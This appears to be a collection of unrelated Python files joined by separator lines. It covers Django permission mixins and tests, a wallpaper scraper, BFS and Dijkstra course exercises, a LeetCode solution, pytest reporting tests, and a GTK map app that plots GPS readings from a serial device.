def dispatch(self, request, *args, **kwargs):
# rdo = Group.objects.get(name='rdo')
# print(request.user.groups)
if not request.user.groups.filter(name='rdo').exists():
raise Http404(
f'User not allowed to access {request.get_full_path()}')
return super(IsRDO, self).dispatch(request, *args, **kwargs)
class IsPAO:
"""
User should belong to the TMO group to access this webpage
"""
def dispatch(self, request, *args, **kwargs):
# pao = Group.objects.get(name='pao')
# print(request.user.groups)
if not request.user.groups.filter(name='pao').exists():
raise Http404(
f'User not allowed to access {request.get_full_path()}')
return super(IsPAO, self).dispatch(request, *args, **kwargs)
|
from bs4 import BeautifulSoup
import requests
import urllib.request
res= requests.get('https://bing.wallpaper.pics/')
soup= BeautifulSoup(res.text, 'lxml')
imageUrl= soup.find('div', class_='panel').find('img')['src']
urllib.request.urlretrieve(imageUrl , 'bing.jpg') |
from django.forms import ModelForm
from myapp.models import *
# Create the form class.
class MeasurementForm(ModelForm):
class Meta:
model = Measurement
fields = ['msmtType', 'value', ] |
#Uses python3
import sys
import queue
import math
#=============================================
sample_undigraph0 = """
4 5
2 1
4 3
1 4
2 4
3 2
"""
# 1 3 Test Source and Terminus
sample_undigraph1 = """
4 4
1 2
4 1
2 3
3 1
2 4
"""
sample_undigraph2 = """
5 4
5 2
1 3
3 4
1 4
3 5
"""
sample_digraph1 = """
5 8
4 3
1 2
3 1
3 4
2 5
5 1
5 4
5 3
"""
sample_digraph2 = """
5 1
4 3
"""
sample_wdigraph1 = """
4 4
1 2 1
4 1 2
2 3 2
1 3 5
1 3
"""
sample_wdigraph2 = """
5 9
1 2 4
1 3 2
2 3 2
3 2 1
2 4 2
3 5 4
5 4 1
2 5 3
3 4 4
1 5
"""
sample_wdigraph3 = """
3 3
1 2 7
1 3 5
2 3 2
3 2
"""
sample_wdigraph4 = """
3 3
2 3 9
1 3 5
1 2 -2
"""
#=============================================
def DFS(adj): # adj is the list of vertices in graph G
"""DFS is Depth First Search of (undirected) graph.
adj is adjacency list for graph.
Returns number of distinct connected components."""
global cc
global visited
for v in range(len(adj)): # adjacency list has length == number of nodes
visited[v] = False
cc = 1
for v in range(len(adj)):
if not visited[v]:
explore(v)
# increment connected component count after each return from explore()
cc = cc + 1 # only increment for each unvisited node explored here
return cc
#=============================================
# Queue in Python can be implemented by the following ways <https://www.geeksforgeeks.org/queue-in-python/>:
# list:
# q = [] # initialize
# with append(), pop(). But this is slow
# collections.deque
# from collections import deque # double-ended queue
# q = deque() # Initializing a queue
# q.append(x) # Adding elements to a queue
# print(q.popleft()) # Removing elements from a queue
# queue.Queue
# from queue import Queue
# q = Queue(maxsize = 3) # Initializing a queue and setting maxsize
# queue.maxsize # size limit for queue
# queue.empty() # Return True if the queue is empty, False otherwise.
# queue.full() # Return True if there are maxsize items in the queue. If the queue was initialized with maxsize=0 (the default), then full() never returns True.
# queue.qsize() # Return the number of items in the queue. If no free slot is immediately available, raise QueueFull.
# queue.put_nowait(item) # Put an item into the queue without blocking.
# queue.get_nowait() # Return an item if one is immediately available, else raise QueueEmpty.
# queue.put(item) # Put an item into the queue. If the queue is full, wait until a free slot is available before adding the item.
# queue.get() # Remove and return an item from the queue. If queue is empty, wait until an item is available.
def enqueue(Q, x):
"""enqueue x on the queue Q"""
# Q.append(x)
Q.put_nowait(x)
if debug:
print("enqueue", x, ":", end=" ")
show_queue(Q)
return Q
def dequeue(Q):
"""dequeue x from the queue Q"""
# x = Q.pop(0) # default is to pop from end (LIFO stack), param 0 indicates FIFO queue
x = Q.get_nowait() # default is to pop from end (LIFO stack), param 0 indicates FIFO queue
if debug:
print("dequeue :", end=" ")
show_queue(Q)
return(Q, x)
def show_queue(Q):
"""display the entire queue in one printed line
"""
print("(Size of the queue:", Q.qsize(), ")", end=" ")
for n in list(Q.queue):
print(n, end=" ")
print()
#=============================================
def BFS(adj,s):
"""Breadth First Search of a graph
adj is node adjacency list for graph G defined by vertices V and edgelist E,
s is the starting node frome which distances are measured
returns distances to all nodes from s
"""
# The running time of breadth-first search is O(|E|+|V|)
V = range(len(adj)) # sequence of nodes
# Note!!: this is not entirely general - there is no quarantee that
# the graph node list is sequentially numbered from 0 to n-1
approxInf = 2*len(V) # establish an impossibly far distance, signal not visited
dist = [approxInf for u in V] # initialize distance to unk for all u∈V
dist[s] = 0 # zero distance to start node
Q = queue.Queue(maxsize = len(adj)+1) # initialize a sufficiently large queue
enqueue(Q,s) # queue containing just s
while not Q.empty(): # Q !empty
(Q,u) = dequeue(Q) # ? is there a better way than passing this queue around?
for v in adj[u]: # all (u,v) ∈ E
if dist[v] == approxInf: # have not explored yet
Q = enqueue(Q,v)
dist[v] = dist[u] + 1 # increment distance, & signal node visited
return(dist)
def distanceBFS(adj, s, t):
#write your code here
dist = BFS(adj,s)
if dist[t] < (len(adj)+1): # warning: need to check for t outside range of nodes in dist
return dist[t]
else:
return -1
def parse_weighted_digraph_input_to_G_s_and_t(inputtext):
"""
Expect text file/string describing graph consistent with
Graph Algorithms course standard,
followed by a line with start and target node numbers.
Returns:
adj - adjacency matrix
cost - edge costs organized in same way as adjacency matrix
s - source node (origin)
t - terminal node (destination)
"""
data = list(map(int, inputtext.split()))
n, m = data[0:2] # count of verts and edges
data = data[2:]
# pick off every third element and organize into a m x 3 edge list
edges = list(zip(zip(data[0:(3 * m):3], data[1:(3 * m):3]), data[2:(3 * m):3]))
data = data[3 * m:] # last line is (s, t)
# following assumes that n vertices are number sequentially 1 to n
adj = [[] for _ in range(n)] # list of n lists, one for each node
cost = [[] for _ in range(n)] # organize costs like edge list
for ((a, b), w) in edges:
adj[a - 1].append(b - 1)
cost[a - 1].append(w)
s, t = data[0] - 1, data[1] - 1
return (adj, cost, s, t)
"""**Dijkstra(G, S)**
for all u∈V:
dist[u] ← ∞, prev[u] ← nil
dist[S] ← 0
H ← MakeQueue(V ) {dist-values as keys} # this is the Unknown region, not(R)
while H is not empty:
u ← ExtractMin(H)
# Lemma: When a node u is selected via ExtractMin, dist[u] = d(S,u).
for all (u,v)∈ E: # relax _outgoing_ edges from u
if dist[v] > dist[u]+w(u,v):
dist[v] ← dist[u] + w(u, v)
prev[v] ← u
ChangePriority(H , v , dist [v])
"""
def make_queueAlt(V, ds):
"""
Create a queue as list of paired vertices and priorities (distance upper bounds)
"""
H = []
for i in V:
H.append([i, ds[i]])
# H.append([i, ds[i]])
return(H)
def make_queue(V):
"""
Create a queue of paired vertices as a simple list
"""
H = []
for i in V:
H.append(i)
return(H)
def extract_minOld(H):
"""
def extract_minOld(H)
extracts the element (vertex) from list `H` with minimum distance estimate (upper bound).
Assumes the queue/list has pairs of vertices and distances.
Returns the pair [vertex, distance]
"""
minDist = approxInf
u = None
for v in H:
if v[1] <= minDist:
minDist = v[1]
u = v
return(H.pop(u))
def extract_minOld2(H):
"""
extract_minOld2(H)
extract the node from queue H with the minimal upper-bound estimate of distance to source s.
For this node v, the bound distance dist(v) will be the actual distance d(s,v).
Return the min dist node, its distance, and the reduced set H.
"""
minDist = approxInf
u = None
i = 0
for (v, d) in H:
if d <= minDist:
minDist = d
u = v # note that u is unused (instead returned by pop)
imin = i
i += i
return(H.pop(imin)) # return [u, d]
def extract_min(H, ds):
"""
extract_min(H, ds)
extract the node from queue `H` with the minimal upper-bound estimate of distance to source s.
`ds` distance array is also passed, absent a priority queue implementation.
For this node v, the bound distance ds(v) will be the actual distance d(s,v).
Return the min dist node, its distance
(but not the reduced set H).
"""
minDist = approxInf
u = None # min vertex unknown
i = 0
for v in H:
if ds[v] <= minDist:
minDist = ds[v]
u = v # note that u is unused (instead returned by pop)
imin = i
i += 1
return(H.pop(imin)) # return [u, d]
# In Dijkstra: we generate an SPT (shortest path tree) for a given source `S` as root.
# The algorithm maintains two sets:
# The set H of "unknown" vertices includes vertices that that have not been fully evalated,
# and that are not yet included in the shortest-path tree.
# The other set/region, R = not(H), contains vertices whose distance to root is correctl known,
# and which are included in the shortest-path tree.
def dijkstra(adj, cost, s, t):
"""
dijkstra(adj, cost, s, t)
From weighted, directed graph G represented as adjacency matrix `adj`,
and (non-negative) edge weights organized similarly in `cost`,
return the distance or shortest path from source `s` to terminus `t`.
Return -1 if no path found, or any edge weight is negative.
"""
V = range(len(adj)) # set of nodes, sequentially numbered
# Note!!: this is not entirely general - there is no quarantee that
# the graph node list is sequentially numbered from 0 to n-1
# for all u∈V:
# dist[u] ← ∞, prev[u] ← nil
# dist[v] will be an upper bound on the actual distance from s to v.
dist = [approxInf for u in V] # initialize dist to completely unknown for all u∈V
prev = [None for u in V]
# visited = [False for u in V] # this is represented as dist[u] = infinite
dist[s] = 0 # zero distance to start node
# H ← MakeQueue(V ) {dist-values as keys} # this is the Unknown region, not(R)
# the set of unknown (unvisited, or not fully visited) vertices
H = make_queue(V) #, dist)
while len(H) > 0: # H, set of unknown vertices is not empty:
# On each iteration we take a vertex outside of R (in H) with the minimal dist-value,
# add it to R, and relax all its outgoing edges.
u = extract_min(H, dist) # [u, d] = extract_min(H)
# Lemma: When a node u is selected via ExtractMin, dist[u] = d(S,u), actual minimum distance.
# First node to be extracted will be the source s (since dist[s]==0)
# Should we stop early if min node u == t (t is moved to known set R before unknown H is exhausted)?
for i in range(len(adj[u])): # for all (u,v) ∈ E: Relax(u,v) # relax all _outgoing_ edges from u
# edge relaxation procedure for an edge (u,v) just checks whether
# going from s to v through u improves the current value of dist[v].
v = adj[u][i] # v in adj[u]
if dist[v] > (dist[u] + cost[u][i]): # + w(u,v):
dist[v] = dist[u] + cost[u][i] # update the distance
prev[v] = u # update the predecessor node
# ChangePriority(H , v , dist[v]) # rather than priority queue, update dist and scan array for min dist
return dist[t]
def distance(adj, cost, s, t):
#write your code here
dist_to_t = dijkstra(adj, cost, s, t)
if dist_to_t < approxInf:
return dist_to_t
else:
return -1
# Task. Given an directed graph with positive edge weights and
# with `n` vertices and 𝑚 edges as well as two vertices `u` and `v`,
# compute the weight of a shortest path between `u` and `v`
# (that is, the minimum total weight of a path from `u` to `v`).
# Input Format. A graph is given in the standard format.
# The next (final) line contains two vertices `u` and `v`.
# Output Format.
# Output the minimum weight of a path from `u` to `v`, or −1 if there is no path.
if __name__ == '__main__':
debug = False
readFromStandardInput = True
if readFromStandardInput:
(adj, cost, s, t) = parse_weighted_digraph_input_to_G_s_and_t(sys.stdin.read())
else: # expect a named data structure (list) to read from
(adj, cost, s, t) = parse_weighted_digraph_input_to_G_s_and_t(sample_wdigraph1)
approxInf = math.inf # establish an impossibly far distance, signal upper bound
print(distance(adj, cost, s, t))
|
from django.test import Client
from django.test import SimpleTestCase
from adminlte2_templates.core import reverse
class ContextTestCase(SimpleTestCase):
def setUp(self):
self.client = Client()
def context_exists(self, context):
# Get view from 'layouts' unit test
response = self.client.get(reverse('layouts:default_boxed'))
try:
return response.context[context] is not None
except KeyError:
return False
def test_debug_context(self):
self.assertTrue(self.context_exists('DEBUG'))
def test_html_lang_context(self):
self.assertTrue(self.context_exists('ADMINLTE_HTML_LANG'))
def test_html_lang_bidi_context(self):
self.assertTrue(self.context_exists('ADMINLTE_HTML_LANG_BIDI'))
def test_skin_style_context(self):
self.assertTrue(self.context_exists('ADMINLTE_SKIN_STYLE'))
def test_control_style_context(self):
self.assertTrue(self.context_exists('ADMINLTE_CONTROL_STYLE'))
def test_footer_version_context(self):
self.assertTrue(self.context_exists('ADMINLTE_FOOTER_VERSION'))
def test_use_shim_context(self):
self.assertTrue(self.context_exists('ADMINLTE_USE_SHIM'))
def test_use_cdn_context(self):
self.assertTrue(self.context_exists('ADMINLTE_USE_CDN'))
def test_use_cdn_context_true(self):
with self.settings(ADMINLTE_USE_CDN=True):
self.assertTrue(self.context_exists('ADMINLTE_CDN_ADMINLTE_CSS_CORE'))
self.assertTrue(self.context_exists('ADMINLTE_CDN_ADMINLTE_CSS_SKIN'))
self.assertTrue(self.context_exists('ADMINLTE_CDN_ADMINLTE_JS_CORE'))
self.assertTrue(self.context_exists('ADMINLTE_CDN_BOOTSTRAP_CSS_CORE'))
self.assertTrue(self.context_exists('ADMINLTE_CDN_BOOTSTRAP_JS_CORE'))
self.assertTrue(self.context_exists('ADMINLTE_CDN_JQUERY_JS_CORE'))
def test_use_cdn_context_false(self):
with self.settings(ADMINLTE_USE_CDN=False):
self.assertFalse(self.context_exists('ADMINLTE_CDN_ADMINLTE_CSS_CORE'))
self.assertFalse(self.context_exists('ADMINLTE_CDN_ADMINLTE_CSS_SKIN'))
self.assertFalse(self.context_exists('ADMINLTE_CDN_ADMINLTE_JS_CORE'))
self.assertFalse(self.context_exists('ADMINLTE_CDN_BOOTSTRAP_CSS_CORE'))
self.assertFalse(self.context_exists('ADMINLTE_CDN_BOOTSTRAP_JS_CORE'))
self.assertFalse(self.context_exists('ADMINLTE_CDN_JQUERY_JS_CORE'))
# Shims
def test_use_cdn_and_use_shim_context_true(self):
with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_USE_SHIM=True):
self.assertTrue(self.context_exists('ADMINLTE_CDN_HTML5SHIV_JS_CORE'))
self.assertTrue(self.context_exists('ADMINLTE_CDN_RESPOND_JS_CORE'))
def test_use_cdn_and_use_shim_context_false(self):
with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_USE_SHIM=False):
self.assertFalse(self.context_exists('ADMINLTE_CDN_HTML5SHIV_JS_CORE'))
self.assertFalse(self.context_exists('ADMINLTE_CDN_RESPOND_JS_CORE'))
# DataTables
def test_use_cdn_and_enable_datatables_context_true(self):
with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_DATATABLES=True):
self.assertTrue(self.context_exists('ADMINLTE_CDN_DATATABLES_CSS_CORE'))
self.assertTrue(self.context_exists('ADMINLTE_CDN_DATATABLES_JS_CORE'))
def test_use_cdn_and_enable_datatables_context_false(self):
with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_DATATABLES=False):
self.assertFalse(self.context_exists('ADMINLTE_CDN_DATATABLES_CSS_CORE'))
self.assertFalse(self.context_exists('ADMINLTE_CDN_DATATABLES_JS_CORE'))
# Font Awesome
def test_use_cdn_and_enable_fontawesome_context_true(self):
with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_FONTAWESOME=True):
self.assertTrue(self.context_exists('ADMINLTE_CDN_FONTAWESOME_CSS_CORE'))
def test_use_cdn_and_enable_fontawesome_context_false(self):
with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_FONTAWESOME=False):
self.assertFalse(self.context_exists('ADMINLTE_CDN_FONTAWESOME_CSS_CORE'))
# Select2
def test_use_cdn_and_enable_select2_context_true(self):
with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_SELECT2=True):
self.assertTrue(self.context_exists('ADMINLTE_CDN_SELECT2_CSS_CORE'))
def test_use_cdn_and_enable_select2_context_false(self):
with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_SELECT2=False):
self.assertFalse(self.context_exists('ADMINLTE_CDN_SELECT2_CSS_CORE'))
|
from django.db.models.signals import post_save
from django.dispatch import receiver
from onadata.apps.logger.models import MergedXForm
from onadata.libs.permissions import OwnerRole
from onadata.libs.utils.project_utils import set_project_perms_to_xform
@receiver(
post_save,
sender=MergedXForm,
dispatch_uid='set_project_perms_to_merged_xform')
def set_object_permissions(sender, instance=None, created=False, **kwargs):
if created:
OwnerRole.add(instance.user, instance)
OwnerRole.add(instance.user, instance.xform_ptr)
if instance.created_by and instance.user != instance.created_by:
OwnerRole.add(instance.created_by, instance)
OwnerRole.add(instance.created_by, instance.xform_ptr)
set_project_perms_to_xform(instance, instance.project)
set_project_perms_to_xform(instance.xform_ptr, instance.project)
|
"""parallelizer tester
Useful to make sure tests are being parallelized properly, and then reported correctly.
This file is named specially to prevent being picked up by py.test's default collector, and should
not be run during a normal test run.
"""
import random
from time import sleep
import pytest
pytestmark = pytest.mark.usefixtures('param', 'wait')
def pytest_generate_tests(metafunc):
# Starts at 10 for vane reason: Artifactor report does a naive sort, so 10 comes before 1
ids = [i + 10 for i in xrange(20)]
random.shuffle(ids)
argvalues = [[v] for v in ids]
metafunc.parametrize(['param'], argvalues, ids=ids, scope='module')
@pytest.fixture
def wait():
# Add some randomness to make sure reports are getting mixed up like they would in a "real" run
sleep(random.random() * 5)
@pytest.fixture
def setup_fail():
raise Exception('I failed to setup!')
@pytest.yield_fixture
def teardown_fail():
yield
raise Exception('I failed to teardown!')
def test_passes():
pass
def test_fails():
raise Exception('I failed!')
@pytest.mark.xfail
def test_xfails():
raise Exception('I failed!')
@pytest.mark.xfail
def test_xpasses():
pass
def test_fails_setup(setup_fail):
pass
def test_fails_teardown(teardown_fail):
pass
@pytest.mark.skipif('True')
def test_skipped():
pass
|
class Solution:
def minimumHammingDistance(self, source: List[int], target: List[int], allowedSwaps: List[List[int]]) -> int:
"""DFS.
"""
graph = defaultdict(set)
for a, b in allowedSwaps:
graph[a].add(b)
graph[b].add(a)
visited = set()
res = 0
for i in range(len(source)):
if i not in visited:
visited.add(i)
s, t = defaultdict(int), defaultdict(int)
self._dfs(s, t, graph, i, visited, source, target)
for k in s:
res += max(0, s[k] - t[k])
return res
def _dfs(self, s, t, graph, i, visited, source, target):
s[source[i]] += 1
t[target[i]] += 1
for nei in graph[i]:
if nei not in visited:
visited.add(nei)
self._dfs(s, t, graph, nei, visited, source, target)
|
__version__ = "$Id$"
import mac_windowbase
_Toplevel = mac_windowbase._Toplevel
toplevel = _Toplevel()
mac_windowbase.toplevel = toplevel
from mac_windowbase import *
addclosecallback = toplevel.addclosecallback
canceltimer = toplevel.canceltimer
close = toplevel.close
mainloop = toplevel.mainloop
newcmwindow = toplevel.newcmwindow
newwindow = toplevel.newwindow
select_setcallback = toplevel.select_setcallback
setcursor = toplevel.setcursor
settimer = toplevel.settimer
setidleproc = toplevel.setidleproc
cancelidleproc = toplevel.cancelidleproc
lopristarting = toplevel.lopristarting
getscreensize = toplevel.getscreensize
getscreendepth = toplevel.getscreendepth
# remove superfluous names
del mac_windowbase
del toplevel
|
import serial
import serial.tools.list_ports_linux as ports
import gi.repository.GLib as gobject
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk as gtk
import pytopo.MapWindow as MapWindow
import pytopo.MapViewer as MapViewer
import gc
import re
class MyMapWindow(MapWindow):
#override init
def __init__(self, _controller):
MapWindow.__init__(self, _controller)
ad = gtk.Adjustment(value=15,lower=2,upper=19,step_increment=1,page_increment=0,page_size=0)
self.spin = gtk.SpinButton(adjustment=ad, climb_rate=1, digits=0)
self.connected_dev = None;
self.connected = False;
self.devices = gtk.ListStore(str, str)
self.renderer = gtk.CellRendererText()
self.grid = gtk.Grid()
self.devices_combo = gtk.ComboBox.new_with_model_and_entry(self.devices)
self.connect_button = gtk.Button.new_with_label("Connect")
self.disconnect_button = gtk.Button.new_with_label("Disconnect")
#override show window
def show_window(self, init_width, init_height):
"""Create the initial window."""
win = gtk.Window()
win.set_name("Ground Station")
win.connect("destroy", self.graceful_exit)
win.set_border_width(5)
win.add(self.grid)
self.load_devices()
self.devices_combo.pack_start(self.renderer, True)
self.devices_combo.add_attribute(self.renderer, 'text', 0)
self.devices_combo.set_entry_text_column(1)
self.devices_combo.connect("changed",self.on_chose_from_combo)
self.connect_button.connect("clicked", self.click_connect)
self.disconnect_button.connect("clicked", self.click_disconnect)
self.disconnect_button.set_sensitive(False)
self.drawing_area = gtk.DrawingArea()
self.grid.attach(self.drawing_area,0,0,50,50)
self.grid.attach(self.devices_combo,50,0,10,1)
self.grid.attach(self.spin,50,1,10,1)
self.grid.attach(self.connect_button,50,2,10,1)
self.grid.attach(self.disconnect_button,50,3,10,1)
#make widget fill window
self.drawing_area.set_vexpand(True)
self.drawing_area.set_hexpand(True)
self.devices_combo.set_vexpand(False)
self.devices_combo.set_hexpand(False)
self.drawing_area.set_events(gtk.gdk.EXPOSURE_MASK |
gtk.gdk.SCROLL_MASK |
gtk.gdk.POINTER_MOTION_MASK |
gtk.gdk.POINTER_MOTION_HINT_MASK |
gtk.gdk.BUTTON_PRESS_MASK |
gtk.gdk.BUTTON_RELEASE_MASK)
try:
# GTK2:
self.drawing_area.connect("expose-event", self.expose_event)
except TypeError:
# Python3/GI GTK3:
self.drawing_area.connect('size-allocate', self.on_size_allocate)
self.width = self.height = 0
self.drawing_area.connect('draw', self.expose3)
self.drawing_area.connect("button-press-event", self.mousepress)
self.drawing_area.connect("button-release-event", self.mouserelease)
self.drawing_area.connect("scroll-event", self.scroll_event)
self.drawing_area.connect("motion_notify_event", self.drag_event)
self.drawing_area.connect("focus-in-event", self.nop)
self.drawing_area.connect("focus-out-event", self.nop)
# Handle key presses on the drawing area.
self.drawing_area.set_property('can-focus', True)
self.drawing_area.connect("key-press-event", self.key_press_event)
# Resize the window now to the desired initial size:
win.resize(init_width, init_height)
win.show_all()
if self.gps_poller:
gobject.threads_init()
gtk.main()
def selection_window(self):
#manual beginning site
site = ['Home', 31.121302, 30.018407, 'Wikimedia', 15]#wikimedia
self.controller.use_site(site, self)
return;
#this function is called when GO button is clicked
def go_to_location(self):
while self.connected_dev.in_waiting:
line =self.connected_dev.readline().decode("utf-8")
matchObj = re.match( r'GPS,(.*),(.*),(.*),(.*),(.*),(.*),(.*),', line)
if matchObj:
print(float(matchObj.group(1)), float(matchObj.group(2)), str(matchObj.group(3)), float(matchObj.group(4)), str(matchObj.group(5)))
self.collection.zoom_to(self.spin.get_value_as_int() ,self.center_lat)
self.pin_lon = float(matchObj.group(4))
self.pin_lat = float(matchObj.group(2))
self.draw_map()
else:
print(line)
return self.connected
def on_chose_from_combo(self, combo):
itr = combo.get_active_iter()
model = combo.get_model()
if model[itr][0] == "Search":
self.load_devices()
def load_devices(self):
self.devices = gtk.ListStore(str, str)
lis = ports.comports()
for port in lis:
self.devices.append([port.device, port.manufacturer])
self.devices.append(["Search","None"])
self.devices_combo.set_model(self.devices)
self.connected_dev = None
def click_connect(self, widget):
itr = self.devices_combo.get_active_iter()
model = self.devices_combo.get_model()
if itr == None:
print(f'Select Valid device')
return
selected = model[itr][0]
for port in ports.comports():
if(port.device == selected):
self.connected_dev = serial.Serial(selected)
self.connected = True;
self.connect_button.set_sensitive(False)
self.disconnect_button.set_sensitive(True)
self.devices_combo.set_sensitive(False)
gobject.timeout_add(50, self.go_to_location)
return
print(f'{selected} is not connected device')
def click_disconnect(self, widget):
self.connected = False
self.connect_button.set_sensitive(True)
self.disconnect_button.set_sensitive(False)
self.devices_combo.set_sensitive(True)
class MyMapViewer(MapViewer):
def main(self):
"""main execution routine for pytopo."""
self.exec_config_file()
# Remember how many known sites we got from the config file;
# the rest are read in from saved sites and may need to be re-saved.
self.first_saved_site = len(self.KnownSites)
# Now it's safe to read the saved sites.
self.read_saved_sites()
self.read_tracks()
gc.enable()
mapwin = MyMapWindow(self)
mapwin.selection_window()
mapwin.show_window(self.init_width, self.init_height)
viewer = MyMapViewer()
viewer.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.